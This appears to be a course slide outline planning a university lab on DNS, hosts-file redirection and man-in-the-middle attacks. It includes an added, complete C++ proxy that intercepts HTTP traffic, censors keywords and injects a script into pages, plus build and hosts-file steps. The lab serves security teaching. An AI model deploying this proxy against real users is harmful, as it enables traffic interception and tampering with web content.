Date post: | 26-Dec-2015 |
Upload: | ada-nichols |
WHERE WERE WE LAST TIME?
• Rough outline of the content of the lab
• Real world connections
• General explanation of DNS
PROGRESS SINCE LAST UPDATE
• Researched various sources
• Helps our understanding
• Can provide resources in lab as hints
• Fleshed out ideas into main steps of lab
• Answered questions posed by Professor
SOURCES COMPILED
• DNS Architecture
• The Hosts File and What it can do for you
• Decrypting SSL traffic with Wireshark and ways to prevent it
• Traffic Analysis with Wireshark
• Using Wireshark to Decode SSL/TLS Packets
• Investigation of DHCP Packets using Wireshark
• Wireshark Lab: DNS
• Wireshark User’s Guide
• Man in the Middle Attack: Tutorial
BACKGROUND REQUIRED
• What is DNS
• Using Wireshark
• Socket Programming (C, C++, Java)
• Proxies
• Man-in-the-Middle Attack
• Cookies
Professor Egele asked about using compiled vs. non-compiled languages:
• Compiled would be better to simulate a “virus” which can be spread and execute remotely
STEP 1: RECONNAISSANCE
• Use Wireshark to examine the following about HTTP and DNS packets sent to your “target” website:
• What is the IP address associated with that website?
• Where is the traffic going from/to?
• What information is being sent in the HTTP packets?
• Is any of the information encrypted? If so, how does this complicate this process?
• What ports are being used?
Professor Egele asked about DNS vs HTTP
STEP 2: CONTROL SYSTEM
• Use Java, C, or C++ to create a man-in-the-middle proxy which does the following:
• Accepts incoming connections on the port found to be in use in Step 1
• Can support outbound connections to the localhost
• Can read and edit the content passing in each direction between these two connections
• This is the basic framework
• We will add more functionality later
STEP 3: REDIRECT
• Edit the hosts file to redirect traffic to your control system
• Use wireshark to ensure that the packets are being properly redirected
• How are the DNS packets different?
• How are the HTTP packets different?
• Can the client still communicate with the server?
• What are the limitations of this technique?
• What are the limitations on editing hosts files?
• Are there other ways to accomplish the same goal?
STEP 4: EXPLOIT
• Block all access to the “target” site.
• What are different ways this can be done?
• Redirect the user to a completely different site
• Monitor the traffic for “keywords”
• Send some sort of warning to the “attacker” whenever a site has those words
• Replace content from the site with completely new content
• Change/censor part of the content
• Add content to the site presented to the user
• Can this be used in the context of XSS? (hint: yes)
Suggested by Professor Egele
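A minimal version of the Step 2 control system that already performs the Step 4 edits, added here as an illustration (not code from the original lab or its authors). It is a C++ proxy on POSIX sockets: it listens on a local port, forwards each request unchanged to the real server, and rewrites the response before returning it to the client (keyword alert, censoring, an injected script, and a corrected Content-Length). UPSTREAM_IP, LISTEN_PORT, KEYWORD and INJECT are placeholders to fill in for your target; plain HTTP is assumed, since without a certificate the client trusts the same proxy cannot read or edit an HTTPS body (the Step 5 question).

```cpp
// Added example (not from the original lab): minimal HTTP man-in-the-middle proxy.
// Assumptions: plain HTTP; the client's hosts file points the target name at this
// machine (Step 3); UPSTREAM_IP is a placeholder for the real server address found
// with Wireshark in Step 1; KEYWORD and INJECT are placeholder Step 4 payloads.
#include <cstdio>
#include <string>
#include <unistd.h>
#include <arpa/inet.h>
#include <netinet/in.h>
#include <sys/socket.h>

static const char *UPSTREAM_IP = "192.0.2.10";   // placeholder (TEST-NET-1 address)
static const int LISTEN_PORT = 8080;             // 80 needs root; 8080 for testing
static const char *KEYWORD = "secret";           // Step 4: word that triggers an alert
static const char *INJECT = "<script>alert('mitm')</script>"; // Step 4: injected content

// Step 4 monitor: does the page body mention the keyword?
bool contains_keyword(const std::string &body) {
    return body.find(KEYWORD) != std::string::npos;
}

// Replace every occurrence of `from` with `to` (used for censoring and header edits).
std::string replace_all(std::string s, const std::string &from, const std::string &to) {
    for (size_t pos = 0; (pos = s.find(from, pos)) != std::string::npos; pos += to.size())
        s.replace(pos, from.size(), to);
    return s;
}

// HTTP/1.1 defaults to keep-alive; ask the server for a single response so that
// read_all() below terminates when the server closes the connection.
std::string force_close(std::string req) {
    req = replace_all(req, "Connection: keep-alive", "Connection: close");
    if (req.find("Connection:") == std::string::npos) {
        size_t eol = req.find("\r\n");
        if (eol != std::string::npos) req.insert(eol + 2, "Connection: close\r\n");
    }
    return req;
}

// Rewrite a complete HTTP response: alert on the keyword, censor it, inject a
// script before </body>, then correct Content-Length so the browser neither
// truncates the page nor waits for bytes that no longer exist.
std::string rewrite_response(const std::string &resp) {
    size_t hdr_end = resp.find("\r\n\r\n");
    if (hdr_end == std::string::npos) return resp;   // not an HTTP response we understand
    std::string headers = resp.substr(0, hdr_end + 4);
    std::string body = resp.substr(hdr_end + 4);

    if (contains_keyword(body)) fprintf(stderr, "[alert] keyword \"%s\" seen\n", KEYWORD);
    body = replace_all(body, KEYWORD, "[censored]");
    size_t tag = body.find("</body>");
    if (tag != std::string::npos) body.insert(tag, INJECT);

    size_t cl = headers.find("Content-Length:");   // simplification: exact case only
    if (cl != std::string::npos) {
        size_t eol = headers.find("\r\n", cl);
        headers.replace(cl, eol - cl, "Content-Length: " + std::to_string(body.size()));
    }
    return headers + body;
}

// Read until the peer closes the socket.
static std::string read_all(int fd) {
    std::string out; char buf[4096]; ssize_t n;
    while ((n = read(fd, buf, sizeof buf)) > 0) out.append(buf, n);
    return out;
}

// Outbound leg of the proxy: connect to the real server found in Step 1.
static int connect_upstream() {
    int fd = socket(AF_INET, SOCK_STREAM, 0);
    sockaddr_in a{}; a.sin_family = AF_INET; a.sin_port = htons(80);
    inet_pton(AF_INET, UPSTREAM_IP, &a.sin_addr);
    if (connect(fd, (sockaddr *)&a, sizeof a) < 0) { close(fd); return -1; }
    return fd;
}

int main() {
    int srv = socket(AF_INET, SOCK_STREAM, 0);
    int one = 1; setsockopt(srv, SOL_SOCKET, SO_REUSEADDR, &one, sizeof one);
    sockaddr_in a{}; a.sin_family = AF_INET; a.sin_addr.s_addr = INADDR_ANY;
    a.sin_port = htons(LISTEN_PORT);
    if (bind(srv, (sockaddr *)&a, sizeof a) < 0 || listen(srv, 16) < 0) return 1;
    for (;;) {
        int cli = accept(srv, nullptr, nullptr);
        if (cli < 0) continue;
        char buf[8192];
        ssize_t n = read(cli, buf, sizeof buf);   // simplification: request fits one read
        if (n > 0) {
            // The Host header still names the target (DNS was bypassed, not HTTP),
            // so the request can be forwarded to the real server unchanged.
            std::string req = force_close(std::string(buf, n));
            int up = connect_upstream();
            if (up >= 0) {
                write(up, req.data(), req.size());
                std::string resp = rewrite_response(read_all(up));
                write(cli, resp.data(), resp.size());
                close(up);
            }
        }
        close(cli);
    }
}
```

Build with `g++ -std=c++11 proxy.cpp -o proxy`, run it, and on the client add a hosts-file line mapping the target name to the proxy machine (Step 3: `/etc/hosts` on Unix, `C:\Windows\System32\drivers\etc\hosts` on Windows). For the redirect to be transparent the proxy has to listen on the port the browser uses, which for plain HTTP is 80 and requires root; the example uses 8080 so it can be tested unprivileged with `curl http://localhost:8080/`. The Content-Length correction is the detail most first attempts miss: once bytes are added or removed, the original length is wrong and the browser either cuts the page short or hangs waiting for data that never arrives.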
STEP 5: CONTEXT
• What sort of access does an attacker need to execute this?
• What protections are there to prevent this?
• Does SSL/HTTPS stop this? What can it do?
• How has this been applied on larger scales?
• Can this be done for an entire local network, rather than a single computer?
• How would one go about that?
NEXT STEPS
• Write out lab in Twiki with formatting and questions
• Test lab
• Figure out the timing/difficulty of each question
• Narrow down sources and decide what information to provide